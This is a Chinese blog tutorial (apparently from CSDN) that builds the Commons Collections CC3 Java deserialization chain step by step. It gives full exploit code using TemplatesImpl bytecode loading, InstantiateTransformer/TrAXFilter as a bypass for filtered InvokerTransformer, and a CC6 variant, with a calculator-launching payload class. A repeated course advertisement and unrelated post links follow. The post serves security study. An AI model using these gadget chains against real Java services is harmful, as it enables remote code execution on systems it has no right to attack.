Java反序列化-CC3链

于 2024-05-12 16:11:51 发布
阅读量324 收藏 10
点赞数 4
分类专栏: 程序员 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969642/article/details/138758310
版权 
        throw new RuntimeException(e);
    }
}

}


然后编译成 .class字节码文件  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/1da0405c265b50796719055ddf5a1695.png)  
 正常来说我们运行exp代码会弹窗,但是报错提示出现了空指针错误  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/63780d966773f387fee8a1fcee7eac34.png)  
 来到393行进行断点调试  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/7c4c7174b4e4c64d8566d442aecdba86.png)  
 一直按F8断点调试来到这里,可以看见前面的类加载成功了。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/0c2be13b80b290dda06ae20d927bb6ee.png)  
 这个代码的主要意思是:


* 获取这个加载类的类名,如果类包含 AbstractTranslet这个类,就会来到下面的else代码段,所以我们才显示空指针。


我们可以让加载的类继承AbstractTranslet这个类就好了,继承类之后还要重写方法,最后变成以下代码:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Calc extends AbstractTranslet {
static {
try {
Runtime.getRuntime().exec(“calc”);
} catch (IOException e) {
throw new RuntimeException(e);
}
}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    
}

}


重写编译成字节码文件,最后运行exp代码,可以看见命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/52cba03328dbd4ce8e2235297cafcb88.png)  
 现在已经完成了一半条链了。


### CC3链=CC1前半段链+Templateslmpl类利用链


实际上链子的完整利用前半段一样只是后半段不一样  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/0a9c46a7292303ce791f7b3aaec445ce.png)  
 CC1链唯一修改的地方是这里:

Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)
};

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.awt.event.ItemListener;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());

// templates.newTransformer();
org.apache.commons.collections.Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    chainedTransformer.transform(1);

}

}


可以看见命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/f78b3d20cd7530f1d88e069750e47ad2.png)  
 最后直接放入剩下的CC1前半链

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.awt.event.ItemListener;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());

// templates.newTransformer();
org.apache.commons.collections.Transformer[] transformers = new Transformer[]{
new ConstantTransformer(templates),
new InvokerTransformer(“newTransformer”,null,null)

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// chainedTransformer.transform(1);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
    Class<LazyMap> lazyMapClass = LazyMap.class;

    Class<?> a = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> aihConstructor = a.getDeclaredConstructor(Class.class, Map.class);
    aihConstructor.setAccessible(true);
    //转InvocationHandler类型是为了能够调用处理程序实现的接口
    InvocationHandler aih =  (InvocationHandler) aihConstructor.newInstance(Override.class, lazymap);


    Map proxyMap  = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, aih);
    InvocationHandler o = (InvocationHandler) aihConstructor.newInstance(Override.class, proxyMap);

    serialize(o);
    unserialize("ser.bin");

}

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


反序列化代码后命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/47fa2fab6e6b0e95ce538f6f0429ed90.png)


### 代替InvokerTransformer类链


当服务过滤了这个InvokerTransformer类的时候,我们可以选择其他类代替,作为链子的一部分。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/df9cc74a83f06ef7f0ad862f6b9dc1ec.png)  
 我们可以寻找调用 newTransformer 方法的类的方法  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/b3e0b20de0f319c1935cb1dea83dd41d.png)  
 可以看见这里调用了newTransformer()方法  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/af15ed5e7a7d6caae3a59dc7efd879fe.png)  
 但是由于 TrAXFilter 类并没有继承 序列化接口,所以它不能够进行序列化。需要 TrAXFilter 类的class才可以。


CC3的作者找到了一个 InstantiateTransformer 类的 transform方法。  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/3618b60df06adc0297aeae232048fea5.png)


* 第一个if判断传进来的参数是否是 Class类型
* 然后获取它的指定参数类型的构造器,然后调用它的构造方法


从而构造这个exp代码:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());
    
    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});
    instantiateTransformer.transform(TrAXFilter.class);
        }

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


运行后可以看见成功调用了 TrAXFilter类的 TrAXFilter方法,且命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/133c05f3aa851c0789b52d791b9291fa.png)  
 完整版exp代码:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

// Field tfactory = c.getDeclaredField(“_tfactory”);
// tfactory.setAccessible(true);
// tfactory.set(templates,new TransformerFactoryImpl());

    Transformer[]  transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// instantiateTransformer.transform(TrAXFilter.class);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
    Class<LazyMap> lazyMapClass = LazyMap.class;

    Class<?> a = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> aihConstructor = a.getDeclaredConstructor(Class.class, Map.class);
    aihConstructor.setAccessible(true);
    //转InvocationHandler类型是为了能够调用处理程序实现的接口
    InvocationHandler aih =  (InvocationHandler) aihConstructor.newInstance(Override.class, lazymap);


    Map proxyMap  = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, aih);
    InvocationHandler o = (InvocationHandler) aihConstructor.newInstance(Override.class, proxyMap);

    serialize(o);
    unserialize("ser.bin");
}

//序列化与反序列化
public static void serialize(Object obj) throws IOException {
    ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    oos.writeObject(obj);
}

public static Object unserialize(String Filename) throws  IOException,ClassNotFoundException{
    ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
    Object obj = ois.readObject();
    return obj;
}

}


主要是修改了这段代码:

Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
};


实际上可以删除这段代码也可以运行,因为反序列化的时候readObject方法会自动复制\_tfactory的变量都是一样的

Field tfactory = c.getDeclaredField(“_tfactory”);
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());


最后运行代码,可以发现命令执行成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/7520cc54951311490af63a0c5e72bdc5.png)


### CC6配合CC3的链


原理是CC6的:CC1+URLDNS反射,这里我们加到CC3里,也可以利用

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
public static void main(String[] args) throws Exception {

    TemplatesImpl templates = new TemplatesImpl();

    Class<? extends TemplatesImpl> c = templates.getClass();
    Field name = c.getDeclaredField("\_name");
    name.setAccessible(true);
    name.set(templates,"a");

    Field bytecodes = c.getDeclaredField("\_bytecodes");
    bytecodes.setAccessible(true);
    byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
    byte[][] codes = {eval};
    bytecodes.set(templates,codes);

    Field tfactory = c.getDeclaredField("\_tfactory");
    tfactory.setAccessible(true);
    tfactory.set(templates,new TransformerFactoryImpl());



    org.apache.commons.collections.Transformer[]  transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class),
            new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})

    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

// instantiateTransformer.transform(TrAXFilter.class);

    HashMap<Object, Object> hashMap = new HashMap<>();
    Map lazymap = LazyMap.decorate(hashMap, new ConstantTransformer(1));
    TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
    hashMap.put(tiedMapEntry,null);
    hashMap.remove(null);//也可以修改为lazymap,null改为任意字符都可以

    Class<LazyMap> lazyMapClass = LazyMap.class;
    Field factory = lazyMapClass.getDeclaredField("factory");
    factory.setAccessible(true);
    factory.set(lazymap,chainedTransformer);

    serialize(hashMap);
    unserialize("ser.bin");


}

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

[外链图片转存中…(img-uA3qOIEm-1715501499627)]

[外链图片转存中…(img-F62MT8dF-1715501499628)]

[外链图片转存中…(img-kKfirGZr-1715501499628)]

[外链图片转存中…(img-B1ijJ0DV-1715501499628)]

[外链图片转存中…(img-GDfthONy-1715501499629)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84969642
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用SQL注入漏洞拖库
12-25
利用SQL注入漏洞拖库 - 利用 SQL 注入漏洞拖库的方法 1 建立数据库和表 建立数据库 lab。 在 lab 数据库创建一张表 article
MySQL中的ORDER BY
qq_43752126的博客
11-16 1万+
MySQL中的ORDER BY ​ 当我们使用SELECT语句查询某个数据库的单个列时,如果不排序,数据一般将以它在底层表中出现的顺序显示。这可以是数据最初添加到表中的顺序。但是,如果数据后来进行过更新或删除,则此顺序将会收到MySQL重用回收存储空间的影响。因此,如果不明确控制的话,不能(也不应该)依赖该排序顺序。关系数据库设计理论认为,如果不明确规定排序顺序,则不应该假定检索出的数据的顺序有意义。 ​ 为了明确地排序用SELECT语句检索出的数据,可以使用ORDER BY子句。ORDER BY子句
MySQL order by关键字详解,order by排序
libaiup的博客
11-24 1万+
关键字一、order by 简介1)order by 的作用2)语法格式二、order by 使用1)按照字段名排序2)按照索引进行排序3)降序4)按照多列排序一、order by 简介ORDER BY 关键字用于对结果集进行「排序」。1)order by 的作用ORDER BY 关键字可以使查
MySQL之orderby详解
qq_40276626的博客
10-13 1万+
MySQL中
MySQL之ORDER BY 详细解析
firstcode666的博客
12-06 2742
1 概述 MySQL有两种方式可以实现ORDER BY: 1.通过索引扫描生成有序的结果 2.使用文件排序(filesort) 围绕着这两种排序方式,我们试着理解一下ORDER BY的执行过程以及回答一些常见的问题(下文仅讨论InnoDB存储引擎)。 2 索引扫描排序和文件排序(filesort)简介 我们知道InnoDB存储引擎以B+树作为索引的底层实现,B+树的叶子节点存储着所有数据页而内部节点不存放数据信息,并且所有叶子节点形成一个**(双向)链表**。 举个例...
RMIDeserialize:RMI 序列环境 一步步
04-22
RMI序列学习环境,细节请参考博客、 java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务 java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地...
如何利用Jackson序列忽略指定类型的属性详解
08-26
Jackson 序列Java 世界中最流行的序列框架之一,对于 Apache Avro 对象的序列提供了详细的解决方案。在本文中,我们将介绍如何利用 Jackson 序列忽略指定类型的属性,以避免序列时的 exception。 首先...
miniCAD:CG工作-CC UNIP第五学期
05-17
- 存储和加载CAD设计文件,可能涉及到XML或自定义格式的解析和序列。 - 数据持久的策略和最佳实践。 9. **版本控制**: - 使用Git或其他版本控制系统来跟踪代码的修改,协作开发和代码管理。 10. **软件...
内存高效序列库谷歌/ FlatBuffers
01-27
FlatBuffersFlatBuffers is a cross platform serialization library architected formaximum memory efficiency. It allows you to directly access serialized data without parsing/unpacking it first, while ...
GsonQuick:Gson的辅助工具类, 方便Gson的序列
07-08
GsonQuickGson的辅助工具类, 方便Gson的序列使用可以看Test里面的代码.示例Json如下: { "data": [{ "d": 771133, "a": 856813, "bigHash": "392b979d9568b2c9cc693ce577d7fadf" },{ "d": 123, "a": 43234, ...
MySQL ORDER BY排序一篇就够了
做一个有思想的技术人
09-08 7727
工作中常常会使用ORDER BY进行排序,了解ORDER BY多种排序方式是非常有必要的。
《算法》-排序[优先队列(堆排序)]
m0_37748303的博客
09-04 563
优先队列(堆排序) 优先队列:最重要的操作就是删除最大元素和插入元素 堆排序:堆排序对于记录较少的文件效果一般,对于文件较多还是比较有效的,最差的时间复杂度为nlog(n),属于不稳定排序 堆排序可以被认为是一种改进的选择排序:就像选择算法一样,它将输入分成已排序的和还未排序的区域,它通过提取未排序的区域内最大的元素并将其移动到已排序的区域来迭代缩小未排序的区域。堆排序相对选择排序改进的部分包括使用堆数据结构而不是线性时间的搜索来找到最大值。摘于知乎:堆排序 步骤: 输入:一系列的无序元素(.
MYSQL数据排序(八)ORDER BY
有天你会让我妒忌的.
06-07 1万+
MySQL ORDER BY简介当使用SELECT语句从表中查询数据时,结果集不会按任何顺序排序。要对结果集排序,请使用ORDER BY 子句。ORDER BY 子句允许您:按单列或多列对结果集排序。按升序或降序对不同列进行结果集排序。下面介绍了ORDER BY子句的语法:SELECT column1, column2,... FROM tbl ORDER BY column1 [ASC|DESC...
MySQL学习之order by
thinkabel
05-07 4315
在后端开发过程中,只要和数据库打交道的肯定会用过排序。业务中的各种查询通常对应了用户所看到的各项列表,列表一般是根据某个维度进行排序。换句话说,业务中使用 SELECT 语句的时候除了不可避免的搭配 WHERE 以外,还会配合 ORDER BY 进行使用。我们都知道在SQL语句后加上 order by 字段 asc/desc,就可以实现排序。用法大家都会使用,那么排序的执行流程都熟悉吗?一起来看看吧。联想排序算法对比学习MySQL的排序时,让我想到各种排序算法。比如选择排序、插入排序、堆排序、冒泡排序、快速
AAA-------网安的一种管理机制--认证授权计费
最新发布
2401_84970893的博客
05-12 404
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系
mysql实现按照自定义(指定顺序)排序
热门推荐
quader的博客
02-02 4万+
mysql实现自定义排序
Mysql - ORDER BY详解
weishuai528的博客
08-01 1270
0 索引 1 概述 MySQL有两种方式可以实现 ORDER BY: 1.通过索引扫描生成有序的结果 2.使用文件排序(filesort) 围绕着这两种排序方式,我们试着理解一下ORDER BY的执行过程以及回答一些常见的问题。(下文仅讨论InnoDB存储引擎) 2 索引扫描排序和文件排序(filesort)简介 我们知道InnoDB存储引擎以 B+树 作为索引的底层实现,B+树的 叶子节点 存储着所有数据页而内部节点不存放数据信息,并且所有叶子节点形成一个**(双向)链表**。 举个例子,假设useri
《CTF特训营》学习总结——Reverse:逆向分析概述
PICACHU+++的博客
05-29 7012
一、逆向分析的主要方法 逆向分析主要是将二进制机器码进行汇编得到汇编代码,在汇编代码的基础上,进行功能分析。经过编译生成的汇编代码中缺失了源代码中的符号、数据结构等信息 ............
java的bean对象通过注解在set方法实现自定义序列
05-26
Java 中,我们可以通过实现 Serializable 接口来实现对象的序列序列。不过,有时候我们可能需要对某些属性进行自定义序列,这时可以使用注解来实现。 假设有一个 Person 类,其中包含了 name、age 两...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值